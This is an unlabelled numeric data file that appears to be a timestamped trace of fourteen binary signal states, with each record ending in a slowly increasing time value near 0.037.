0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6941932e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6941956e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6941980e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.6942004e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.6942028e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.6942036e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,1,3.7066388e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,1,3.7066580e-02 1,0,0,1,0,1,0,0,0,1,0,1,0,1,3.7066608e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,1,3.7066636e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,1,3.7066932e-02 1,0,0,1,0,1,0,0,0,0,0,0,1,1,3.7066960e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,1,3.7066964e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,1,3.7067012e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,1,3.7067036e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,1,3.7067088e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,1,3.7067112e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,1,3.7067164e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,1,3.7067188e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7067220e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7067236e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7067260e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7067268e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.7067288e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7067312e-02 1,0,0,1,0,1,0,0,0,0,0,0,0,0,3.7067316e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7067320e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7067336e-02 1,0,0,1,0,0,0,0,0,1,0,0,0,0,3.7067364e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7067368e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.7067388e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7067412e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7067420e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7067460e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7067488e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7067540e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7067564e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7067612e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7067636e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7067688e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7067708e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7067716e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.7067736e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7067764e-02 1,0,0,1,0,1,0,0,0,0,0,0,0,0,3.7067768e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7067772e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7067784e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7067812e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.7067836e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7067860e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7067868e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7067908e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7067932e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7067988e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7068012e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7068060e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7068084e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7068136e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7068160e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7068164e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.7068184e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7068212e-02 1,0,0,1,0,1,0,0,0,0,0,0,0,0,3.7068216e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7068220e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7068236e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7068260e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7068264e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.7068284e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7068308e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7068316e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7068360e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7068384e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7068436e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7068460e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7068508e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7068532e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7068588e-02 1,0,0,1,0,0,0,0,0,1,0,0,0,0,3.7068612e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7068616e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.7068636e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7068660e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7068668e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7068684e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7068708e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7068732e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7068760e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7068784e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7068812e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7068836e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7068860e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7068884e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7068908e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7068932e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7068964e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7068984e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7069012e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7069036e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7069060e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7069108e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7069132e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7069140e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.7069188e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7069212e-02 1,0,0,1,0,1,0,0,0,0,0,0,0,0,3.7069216e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7069220e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7069260e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7069284e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7069336e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7069364e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7069412e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7069436e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7069440e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.7069460e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7069484e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7069492e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7069508e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7069532e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7069564e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7069584e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7069612e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7069636e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7069660e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7069684e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7069708e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7069732e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7069740e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.7069788e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7069812e-02 1,0,0,1,0,1,0,0,0,0,0,0,0,0,3.7069816e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7069820e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7069836e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7069860e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7069884e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7069908e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7069916e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.7069932e-02 1,0,0,1,0,1,0,0,0,0,0,0,0,0,3.7069964e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7069968e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7070012e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7070036e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7070084e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7070108e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7070164e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7070184e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7070236e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7070260e-02 1,0,0,1,0,0,0,0,0,1,0,0,0,0,3.7070264e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7070268e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.7070284e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7070308e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7070316e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7070332e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7070364e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7070384e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7070412e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7070436e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7070460e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7070488e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7070508e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7070536e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7070564e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7070588e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7070612e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7070636e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7070660e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7070688e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7070712e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7070716e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.7070764e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7070788e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.7070812e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7070836e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7070844e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7070888e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7070912e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7070964e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7070988e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7071036e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7071060e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7071068e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.7071088e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7071112e-02 1,0,0,1,0,1,0,0,0,0,0,0,0,0,3.7071116e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7071120e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7071140e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7071164e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7071188e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7071212e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7071260e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7071288e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7071340e-02 1,0,0,1,0,0,0,0,0,1,0,0,0,0,3.7071364e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7071368e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.7071412e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7071436e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7071444e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7071488e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7071512e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7071564e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7071588e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7071612e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7071636e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7071660e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7071692e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7071748e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7071772e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7071820e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7071844e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7071852e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.7071896e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7071920e-02 1,0,0,1,0,1,0,0,0,0,0,0,0,0,3.7071924e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7071928e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7071972e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7071996e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7072044e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7072068e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7072092e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7072120e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7072124e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.7072172e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7072196e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7072204e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7072220e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7072244e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7072268e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7072292e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7072320e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7072344e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7072372e-02 1,0,0,1,0,0,0,0,0,1,0,0,0,0,3.7072396e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7072400e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.7072444e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7072468e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7072476e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7072492e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7072520e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7072524e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.7072572e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7072596e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7072604e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7072620e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7072644e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7072676e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7072700e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7072724e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7072748e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7072756e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.7072772e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7072800e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7072804e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7072852e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7072876e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7072900e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7072924e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7072932e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.7072948e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7072972e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7072980e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7073028e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7073052e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7073100e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7073124e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7073176e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7073200e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7073252e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7073276e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7073280e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.7073300e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7073324e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7073332e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7073348e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7073372e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7073380e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.7073428e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7073452e-02 1,0,0,1,0,1,0,0,0,0,0,0,0,0,3.7073456e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7073460e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7073476e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7073500e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7073524e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7073548e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7073572e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7073600e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7073624e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7073652e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.7073700e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.7073724e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7073732e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7073748e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7073772e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7073800e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7073824e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7073852e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7073876e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7073900e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7073924e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7073948e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7073972e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7074000e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7074024e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7074052e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7074076e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7074100e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7074124e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7074148e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7074172e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7074200e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7074224e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7074252e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7074276e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7074300e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7074324e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7074348e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7074372e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7074400e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7074424e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7074452e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7074476e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7074500e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7074524e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.7074548e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.7074572e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,1,3.7198292e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,3.7198444e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,3.7198468e-02 0,1,0,1,0,0,0,0,0,0,0,1,0,1,3.7198484e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,3.7198512e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,1,3.7198792e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,3.7198820e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,1,3.7198844e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,3.7198868e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,1,3.7198892e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,3.7198916e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,1,3.7198940e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,3.7198968e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,1,3.7198992e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,3.7199020e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,3.7199024e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,1,3.7199044e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7199060e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7199068e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7199092e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7199116e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7199140e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7199168e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7199172e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7199192e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7199220e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7199244e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7199268e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7199292e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7199316e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7199340e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7199368e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7199372e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7199392e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7199420e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7199444e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7199468e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7199492e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7199516e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7199524e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7199540e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7199568e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7199592e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7199620e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7199644e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7199668e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7199692e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7199716e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7199724e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7199740e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7199768e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7199792e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7199820e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7199844e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7199868e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7199872e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7199892e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7199916e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7199940e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7199968e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7199992e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7200020e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7200044e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7200068e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7200076e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7200092e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7200116e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7200140e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7200168e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7200220e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7200244e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7200292e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7200316e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7200368e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7200392e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7200444e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7200468e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7200516e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7200540e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7200592e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7200620e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7200644e-02 